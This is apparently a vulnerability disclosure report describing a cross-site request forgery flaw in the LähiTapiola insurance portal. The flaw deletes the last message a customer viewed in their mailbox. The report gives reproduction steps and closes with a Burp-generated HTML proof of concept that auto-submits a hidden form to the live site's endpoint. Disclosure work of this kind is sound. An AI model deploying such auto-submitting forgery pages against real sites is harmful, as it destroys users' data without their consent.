CSRF allows attacker to delete item from customer's "Postilaatikko"

## Description If the customer navigates to the CSRF-attack page shortly after viewing any message details on the "Postilaatikko", the last item that was viewed by the customer will be deleted. Please see the attached video for an illustration of the bug. ## Steps to reproduce 1. Log in to the Lähitapiola. 2. Navigate to "Vakuutukset" --> "Postilaatikko". 3. Open the details page of e.g. "Asiakastietomuutos"-message. 4. (optional) Navigate to any other page of Lähitapiola-website or click the "Takaisin postilaatikkoon"-button. 5. Open the CSRF-attackpage. 6. Notice that the message was deleted due to the CSRF-request. ## Proof of concept ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://verkkopalvelu.tapiola.fi/a2/AsiakassalkkuWeb/naytaviestiketju.do"> <input type="hidden" name="mn" value="p" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ```